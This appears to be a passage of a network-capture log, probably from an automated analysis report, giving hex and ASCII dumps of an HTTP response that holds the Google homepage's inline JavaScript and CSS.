                                                          2022-10-03 15:28:41 UTC2INData Raw: 33 2c 36 39 37 2c 37 35 2c 31 37 2c 35 39 39 35 38 33 32 2c 32 38 30 33 34 30 31 2c 33 33 31 31 2c 31 34 31 2c 37 39 35 2c 31 39 37 33 35 2c 31 2c 31 2c 33 34 36 2c 31 36 34 39 2c 35 2c 33 2c 33 2c 31 2c 31 2c 31 2c 39 30 2c 36 30 2c 31 36 2c 32 2c 36 2c 31 2c 34 2c 33 2c 37 34 35 31 37 37 39 2c 31 36 34 39 36 38 36 31 2c 34 36 39 2c 34 30 34 31 36 37 33 2c 31 39 36 34 2c 33 30 39 34 2c 31 33 35 37 38 2c 33 34 30 36 2c 31 31 37 34 36 2c 31 34 32 31 32 39 37 27 2c 6b 42 4c 3a 27 67 55 66 63 27 7d 3b 67 6f 6f 67 6c 65 2e 73 6e 3d 27 77 65 62 68 70 27 3b 67 6f 6f 67 6c 65 2e 6b 48 4c 3d 27 65 6e 2d 47 42 27 3b 7d 29 28 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 76 61 72 20 66 3d 74 68 69 73 7c 7c 73 65 6c 66 3b 76 61 72 20 68 2c 6b 3d 5b 5d 3b 66 75 6e 63
                                                          Data Ascii: 3,697,75,17,5995832,2803401,3311,141,795,19735,1,1,346,1649,5,3,3,1,1,1,90,60,16,2,6,1,4,3,7451779,16496861,469,4041673,1964,3094,13578,3406,11746,1421297',kBL:'gUfc'};google.sn='webhp';google.kHL='en-GB';})();(function(){var f=this||self;var h,k=[];func
                                                          2022-10-03 15:28:41 UTC3INData Raw: 6e 21 31 7d 3b 67 6f 6f 67 6c 65 2e 73 78 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 67 6f 6f 67 6c 65 2e 73 79 2e 70 75 73 68 28 61 29 7d 3b 67 6f 6f 67 6c 65 2e 6c 6d 3d 5b 5d 3b 67 6f 6f 67 6c 65 2e 70 6c 6d 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 67 6f 6f 67 6c 65 2e 6c 6d 2e 70 75 73 68 2e 61 70 70 6c 79 28 67 6f 6f 67 6c 65 2e 6c 6d 2c 61 29 7d 3b 67 6f 6f 67 6c 65 2e 6c 71 3d 5b 5d 3b 67 6f 6f 67 6c 65 2e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 67 6f 6f 67 6c 65 2e 6c 71 2e 70 75 73 68 28 5b 5b 61 5d 2c 62 2c 63 5d 29 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 61 64 41 6c 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 67 6f 6f 67 6c 65 2e 6c 71 2e 70 75 73 68 28 5b 61 2c 62 5d 29 7d 3b 67 6f 6f 67 6c 65 2e 62 78 3d 21 31 3b 67 6f 6f 67 6c
                                                          Data Ascii: n!1};google.sx=function(a){google.sy.push(a)};google.lm=[];google.plm=function(a){google.lm.push.apply(google.lm,a)};google.lq=[];google.load=function(a,b,c){google.lq.push([[a],b,c])};google.loadAll=function(a,b){google.lq.push([a,b])};google.bx=!1;googl
                                                          2022-10-03 15:28:41 UTC4INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 68 65 69 67 68 74 3a 32 39 70 78 3b 5f 68 65 69 67 68 74 3a 33 30 70 78 3b 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 74 65 72 3a 61 6c 70 68 61 28 6f 70 61 63 69 74 79 3d 31 30 30 29 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 3b 7a 2d 69 6e 64 65 78 3a 39 39 30 7d 23 67 62 78 33 7b 6c 65 66 74 3a 30 7d 23 67 62 78 34 7b 72 69 67 68 74 3a 30 7d 23 67 62 62 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 23 67 62 62 77 7b 6c 65 66 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 33 30 70 78 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 67
                                                          Data Ascii: border-bottom:1px solid #000;font-size:24px;height:29px;_height:30px;opacity:1;filter:alpha(opacity=100);position:absolute;top:0;width:100%;z-index:990}#gbx3{left:0}#gbx4{right:0}#gbb{position:relative}#gbbw{left:0;position:absolute;top:30px;width:100%}.g
                                                          2022-10-03 15:28:41 UTC6INData Raw: 3a 73 6f 6c 69 64 20 64 61 73 68 65 64 20 64 61 73 68 65 64 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 63 6f 6c 6f 72 3a 23 63 30 63 30 63 30 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 69 6e 6c 69 6e 65 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 68 65 69 67 68 74 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 30 3b 77 69 64 74 68 3a 30 3b 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 33 70 78 20 33 70 78 20 30 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 70 78 3b 6c 65 66 74 3a 34 70 78 7d 23 67 62 7a 74 6d 73 31 2c 23 67 62 69 34 6d 31 2c 23 67 62 69 34 73 2c 23 67 62 69 34 74 7b 7a 6f 6f 6d 3a 31 7d 2e 67 62 74 63 2c 2e 67 62 6d
                                                          Data Ascii: :solid dashed dashed;border-color:transparent;border-top-color:#c0c0c0;display:-moz-inline-box;display:inline-block;font-size:0;height:0;line-height:0;width:0;border-width:3px 3px 0;padding-top:1px;left:4px}#gbztms1,#gbi4m1,#gbi4s,#gbi4t{zoom:1}.gbtc,.gbm
                                                          2022-10-03 15:28:41 UTC7INData Raw: 62 32 2c 2e 67 62 74 6f 20 2e 67 62 67 74 20 2e 67 62 74 62 32 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 77 69 64 74 68 3a 30 7d 2e 67 62 74 62 20 2e 67 62 74 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 5f 38 64 35 61 66 63 30 39 2e 70 6e 67 29 3b 5f 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 38 5f 33 36 31 35 64 36 34 64 2e 70 6e 67 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 2d 32 37 70 78 20 2d 32 32 70 78 3b 62 6f 72 64 65 72 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 70 61 64 64 69 6e 67 3a 32 39 70 78 20 30 20 30 3b
                                                          Data Ascii: b2,.gbto .gbgt .gbtb2{border-top-width:0}.gbtb .gbts{background:url(https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/b8_3615d64d.png);background-position:-27px -22px;border:0;font-size:0;padding:29px 0 0;
                                                          2022-10-03 15:28:41 UTC8INData Raw: 6d 70 69 77 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 23 67 62 67 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 30 7d 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 35 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 6f 20 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 37 70 78 20 35 70 78 20 36 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 23 67 62 69 35 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 5f 38 64 35 61 66 63 30 39 2e 70 6e 67 29 3b 5f 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 38 5f 33 36 31 35 64 36 34 64 2e 70 6e 67 29 3b 62 61 63 6b
                                                          Data Ascii: mpiw{*display:inline}#gbg5{font-size:0}#gbgs5{padding:5px !important}.gbto #gbgs5{padding:7px 5px 6px !important}#gbi5{background:url(https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/b8_3615d64d.png);back
                                                          2022-10-03 15:28:41 UTC9INData Raw: 62 6d 30 6c 2c 2e 67 62 6d 30 6c 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 2e 67 62 6d 68 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 7d 23 67 62 64 34 20 2e 67 62 6d 63 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 35 66 35 66 35 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 30 7d 23 67 62 64 34 20 2e 67 62 73 62 69 63 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 72 61 63 6b 3a 76 65 72 74 69 63 61 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 35 66 35 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 70 78 7d 23 67
                                                          Data Ascii: bm0l,.gbm0l:visited{color:#000 !important;font-weight:bold}.gbmh{border-top:1px solid #bebebe;font-size:0;margin:10px 0}#gbd4 .gbmc{background:#f5f5f5;padding-top:0}#gbd4 .gbsbic::-webkit-scrollbar-track:vertical{background-color:#f5f5f5;margin-top:2px}#g
                                                          2022-10-03 15:28:41 UTC11INData Raw: 34 20 2e 67 62 6d 63 63 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 7d 2e 67 62 70 6d 63 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 65 66 39 64 62 7d 2e 67 62 70 6d 63 20 2e 67 62 70 6d 74 63 7b 70 61 64 64 69 6e 67 3a 31 30 70 78 20 32 30 70 78 7d 23 67 62 70 6d 7b 62 6f 72 64 65 72 3a 30 3b 2a 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 63 6f 6c 6c 61 70 73 65 3b 62 6f 72 64 65 72 2d 73 70 61 63 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 72 6d 61 6c 7d 23 67 62 70 6d 20 2e 67 62 70 6d 74 63 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 23 30 30 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6f 6e 74 3a 31 31 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 23 67 62 70 6d 73 7b
                                                          Data Ascii: 4 .gbmcc{margin-top:5px}.gbpmc{background:#fef9db}.gbpmc .gbpmtc{padding:10px 20px}#gbpm{border:0;*border-collapse:collapse;border-spacing:0;margin:0;white-space:normal}#gbpm .gbpmtc{border-top:none;color:#000 !important;font:11px Arial,sans-serif}#gbpms{
                                                          2022-10-03 15:28:41 UTC12INData Raw: 6e 3a 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 2d 6d 6f 7a 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 3b 2d 77 65 62 6b 69 74 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 7d 2e 67 62 71 66 62 3a 66 6f 63 75 73 2c 2e 67 62 71 66 62 61 3a 66 6f 63 75 73 2c 2e 67 62 71 66 62 62 3a 66 6f 63 75 73 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 34 64 39 30 66 65 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 30 20 30 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 35 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 30 20 30 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 35 29 3b 62 6f 78 2d 73 68 61
                                                          Data Ascii: n:none !important;-moz-user-select:none;-webkit-user-select:none}.gbqfb:focus,.gbqfba:focus,.gbqfbb:focus{border:1px solid #4d90fe;-moz-box-shadow:inset 0 0 0 1px rgba(255, 255, 255, 0.5);-webkit-box-shadow:inset 0 0 0 1px rgba(255, 255, 255, 0.5);box-sha
                                                          2022-10-03 15:28:41 UTC13INData Raw: 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 6d 73 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 34 64 39 30 66 65 2c 23 34 37 38 37 65 64 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 6f 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 34 64 39 30 66 65 2c 23 34 37 38 37 65 64 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 34 64 39 30 66 65 2c 23 34 37 38 37 65 64 29 3b 66 69 6c 74 65 72 3a 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 67 72 61 64 69 65 6e 74 28 73 74 61 72 74 43 6f 6c 6f 72 53 74 72 3d 27 23 34 64 39 30 66 65 27 2c 45 6e 64 43 6f 6c 6f 72 53 74 72 3d 27 23 34 37
                                                          Data Ascii: ground-image:-ms-linear-gradient(top,#4d90fe,#4787ed);background-image:-o-linear-gradient(top,#4d90fe,#4787ed);background-image:linear-gradient(top,#4d90fe,#4787ed);filter:progid:DXImageTransform.Microsoft.gradient(startColorStr='#4d90fe',EndColorStr='#47
                                                          2022-10-03 15:28:41 UTC14INData Raw: 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 6d 73 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 66 35 66 35 66 35 2c 23 66 31 66 31 66 31 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 6f 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 66 35 66 35 66 35 2c 23 66 31 66 31 66 31 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 66 35 66 35 66 35 2c 23 66 31 66 31 66 31 29 3b 66 69 6c 74 65 72 3a 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 67 72 61 64 69 65 6e 74 28 73 74 61 72 74 43 6f 6c 6f 72 53 74 72 3d 27 23 66 35 66 35 66 35 27 2c 45 6e 64 43 6f 6c 6f 72 53 74
                                                          Data Ascii: );background-image:-ms-linear-gradient(top,#f5f5f5,#f1f1f1);background-image:-o-linear-gradient(top,#f5f5f5,#f1f1f1);background-image:linear-gradient(top,#f5f5f5,#f1f1f1);filter:progid:DXImageTransform.Microsoft.gradient(startColorStr='#f5f5f5',EndColorSt
                                                          2022-10-03 15:28:41 UTC15INData Raw: 74 72 3d 27 23 66 66 66 66 66 66 27 2c 45 6e 64 43 6f 6c 6f 72 53 74 72 3d 27 23 66 62 66 62 66 62 27 29 7d 2e 67 62 71 66 62 62 2d 68 76 72 2c 2e 67 62 71 66 62 62 2d 68 76 72 3a 61 63 74 69 76 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 77 65 62 6b 69 74 2d 67 72 61 64 69 65 6e 74 28 6c 69 6e 65 61 72 2c 6c 65 66 74 20 74 6f 70 2c 6c 65 66 74 20 62 6f 74 74 6f 6d 2c 66 72 6f 6d 28 23 66 66 66 29 2c 74 6f 28 23 66 38 66 38 66 38 29 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 77 65 62 6b 69 74 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 66 66 66 2c 23 66 38 66 38 66 38 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 6d 6f 7a
                                                          Data Ascii: tr='#ffffff',EndColorStr='#fbfbfb')}.gbqfbb-hvr,.gbqfbb-hvr:active{background-color:#fff;background-image:-webkit-gradient(linear,left top,left bottom,from(#fff),to(#f8f8f8));background-image:-webkit-linear-gradient(top,#fff,#f8f8f8);background-image:-moz
                                                          2022-10-03 15:28:41 UTC17INData Raw: 6f 70 28 31 2c 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 29 29 3b 6c 65 66 74 3a 30 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 3b 6f 70 61 63 69 74 79 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 67 62 73 62 20 2e 67 62 73 62 74 3a 61 66 74 65 72 2c 2e 67 62 73 62 20 2e 67 62 73 62 62 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 22 22 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 30 3b 6c 65 66 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 67 62 73 62 69 73 20 2e 67 62 73 62 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 2d 77 65 62 6b 69 74 2d 67 72 61 64 69 65 6e 74 28 6c 69 6e 65 61 72 2c 6c 65 66 74 20 74 6f 70 2c 6c 65 66 74 20
                                                          Data Ascii: op(1,rgba(0,0,0,.1)));left:0;margin-right:0;opacity:0;position:absolute;width:100%}.gbsb .gbsbt:after,.gbsb .gbsbb:after{content:"";display:block;height:0;left:0;position:absolute;width:100%}.gbsbis .gbsbt{background:-webkit-gradient(linear,left top,left
                                                          2022-10-03 15:28:41 UTC18INData Raw: 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 6f 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 62 6f 74 74 6f 6d 2c 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 2c 72 67 62 61 28 30 2c 30 2c 30 2c 30 29 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 62 6f 74 74 6f 6d 2c 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 2c 72 67 62 61 28 30 2c 30 2c 30 2c 30 29 29 3b 62 6f 74 74 6f 6d 3a 30 3b 68 65 69 67 68 74 3a 34 70 78 7d 2e 67 62 73 62 20 2e 67 62 73 62 62 3a 61 66 74 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 65 62 65 62 65 62 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 33 29 3b 62 6f 74 74 6f 6d 3a 30 7d 0a 3c 2f 73 74 79 6c 65 3e
                                                          Data Ascii: round-image:-o-linear-gradient(bottom,rgba(0,0,0,.2),rgba(0,0,0,0));background-image:linear-gradient(bottom,rgba(0,0,0,.2),rgba(0,0,0,0));bottom:0;height:4px}.gbsb .gbsbb:after{border-bottom:1px solid #ebebeb;border-color:rgba(0,0,0,.3);bottom:0}</style>
                                                          2022-10-03 15:28:41 UTC19INData Raw: 73 65 72 69 66 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 6f 70 7d 2e 6c 73 62 3a 61 63 74 69 76 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 64 61 64 63 65 30 7d 2e 6c 73 74 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 7d 3c 2f 73 74 79 6c 65 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 52 54 4d 69 41 57 6d 47 6d 39 4c 4a 45 6a 59 75 79 6d 4e 4a 39 41 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 2e 65 72 64 3d 7b 6a 73 72 3a 31 2c 62 76 3a 31 36 36 34 2c 64 65 3a 74 72 75 65 7d 3b 0a 76 61 72 20 68 3d 74 68 69 73 7c 7c 73 65 6c 66 3b 76 61 72 20 6b 2c 6c 3d 6e 75 6c 6c 21 3d 28 6b 3d 68 2e 6d 65 69 29 3f 6b 3a 31 2c 6e 2c 70 3d 6e 75 6c 6c 21 3d 28 6e 3d 68 2e 73 64 6f 29 3f 6e 3a 21 30 2c 71 3d 30
                                                          Data Ascii: serif;vertical-align:top}.lsb:active{background:#dadce0}.lst:focus{outline:none}</style><script nonce="RTMiAWmGm9LJEjYuymNJ9A">(function(){window.google.erd={jsr:1,bv:1664,de:true};var h=this||self;var k,l=null!=(k=h.mei)?k:1,n,p=null!=(n=h.sdo)?n:!0,q=0
                                                          2022-10-03 15:28:41 UTC20INData Raw: 45 72 72 6f 72 3f 65 3a 45 72 72 6f 72 28 61 29 2c 76 6f 69 64 20 30 3d 3d 3d 64 7c 7c 22 6c 69 6e 65 4e 75 6d 62 65 72 22 69 6e 20 61 7c 7c 28 61 2e 6c 69 6e 65 4e 75 6d 62 65 72 3d 64 29 2c 76 6f 69 64 20 30 3d 3d 3d 62 7c 7c 22 66 69 6c 65 4e 61 6d 65 22 69 6e 20 61 7c 7c 28 61 2e 66 69 6c 65 4e 61 6d 65 3d 62 29 2c 67 6f 6f 67 6c 65 2e 6d 6c 28 61 2c 21 31 2c 76 6f 69 64 20 30 2c 21 31 2c 22 53 79 6e 74 61 78 45 72 72 6f 72 22 3d 3d 3d 61 2e 6e 61 6d 65 7c 7c 22 53 79 6e 74 61 78 45 72 72 6f 72 22 3d 3d 3d 61 2e 6d 65 73 73 61 67 65 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 31 31 29 7c 7c 30 3c 61 2e 6d 65 73 73 61 67 65 2e 69 6e 64 65 78 4f 66 28 22 53 63 72 69 70 74 20 65 72 72 6f 72 22 29 3f 32 3a 30 29 29 3b 72 3d 6e 75 6c 6c 3b 70 26 26 71 3e 3d 6c
                                                          Data Ascii: Error?e:Error(a),void 0===d||"lineNumber"in a||(a.lineNumber=d),void 0===b||"fileName"in a||(a.fileName=b),google.ml(a,!1,void 0,!1,"SyntaxError"===a.name||"SyntaxError"===a.message.substring(0,11)||0<a.message.indexOf("Script error")?2:0));r=null;p&&q>=l
                                                          2022-10-03 15:28:41 UTC22INData Raw: 68 61 3b 62 2e 6f 6e 65 72 72 6f 72 3d 62 2e 6f 6e 6c 6f 61 64 3d 62 2e 6f 6e 61 62 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 64 65 6c 65 74 65 20 69 61 5b 63 5d 7d 63 61 74 63 68 28 64 29 7b 7d 7d 3b 69 61 5b 63 5d 3d 62 3b 62 2e 73 72 63 3d 61 3b 68 61 3d 63 2b 31 7d 2c 69 61 3d 5b 5d 2c 68 61 3d 30 3b 70 28 22 6c 6f 67 67 65 72 22 2c 7b 69 6c 3a 75 2c 6d 6c 3a 74 2c 6c 6f 67 3a 6a 61 7d 29 3b 76 61 72 20 76 3d 77 69 6e 64 6f 77 2e 67 62 61 72 2e 6c 6f 67 67 65 72 3b 76 61 72 20 77 3d 7b 7d 2c 6b 61 3d 7b 7d 2c 78 3d 5b 5d 2c 6c 61 3d 68 2e 62 28 22 30 2e 31 22 2c 2e 31 29 2c 6d 61 3d 68 2e 61 28 22 31 22 2c 21 30 29 2c 6e 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 78 2e 70 75 73 68 28 5b 61 2c 62 5d 29 7d 2c 6f 61 3d 66 75 6e 63 74
                                                          Data Ascii: ha;b.onerror=b.onload=b.onabort=function(){try{delete ia[c]}catch(d){}};ia[c]=b;b.src=a;ha=c+1},ia=[],ha=0;p("logger",{il:u,ml:t,log:ja});var v=window.gbar.logger;var w={},ka={},x=[],la=h.b("0.1",.1),ma=h.a("1",!0),na=function(a,b){x.push([a,b])},oa=funct
                                                          2022-10-03 15:28:41 UTC22INData Raw: 66 61 0d 0a 7d 2c 41 3d 7b 7d 2c 42 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 41 5b 61 5d 7c 7c 28 41 5b 61 5d 3d 5b 5d 29 3b 41 5b 61 5d 2e 70 75 73 68 28 62 29 7d 2c 43 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 42 28 22 6d 22 2c 61 29 7d 2c 71 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 63 2e 73 72 63 3d 61 3b 63 2e 61 73 79 6e 63 3d 6d 61 3b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 3c 6c 61 26 26 28 63 2e 6f 6e 65 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 6f 6e 65 72 72 6f 72 3d 6e 75 6c 6c 3b 74 28 45 72 72 6f 72 28 22 42 75 6e 64 6c 65 20 6c 6f 61 64 20 66 61 69 6c 65 64 3a 20 6e 61 6d 65 3d 22 2b 28 62 7c 7c 22 55 4e 0d
                                                          Data Ascii: fa},A={},B=function(a,b){A[a]||(A[a]=[]);A[a].push(b)},C=function(a){B("m",a)},qa=function(a,b){var c=document.createElement("script");c.src=a;c.async=ma;Math.random()<la&&(c.onerror=function(){c.onerror=null;t(Error("Bundle load failed: name="+(b||"UN
                                                          2022-10-03 15:28:41 UTC22INData Raw: 36 62 33 36 0d 0a 4b 22 29 2b 22 20 75 72 6c 3d 22 2b 61 29 29 7d 29 3b 28 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 6a 73 63 22 29 7c 7c 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 62 6f 64 79 22 29 5b 30 5d 7c 7c 0a 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 68 65 61 64 22 29 5b 30 5d 29 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 63 29 7d 2c 73 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 6f 72 28 76 61 72 20 62 2c 63 3d 30 3b 28 62 3d 78 5b 63 5d 29 26 26 62 5b 30 5d 21 3d 61 3b 2b 2b 63 29 3b 21 62 7c 7c 62 5b 31 5d 2e 6c 7c 7c 62 5b 31 5d 2e 73 7c 7c 28 62 5b 31 5d 2e 73 3d 21 30 2c 72 61 28 32 2c 61 29 2c 62 5b 31 5d 2e
                                                          Data Ascii: 6b36K")+" url="+a))});(document.getElementById("xjsc")||document.getElementsByTagName("body")[0]||document.getElementsByTagName("head")[0]).appendChild(c)},sa=function(a){for(var b,c=0;(b=x[c])&&b[0]!=a;++c);!b||b[1].l||b[1].s||(b[1].s=!0,ra(2,a),b[1].
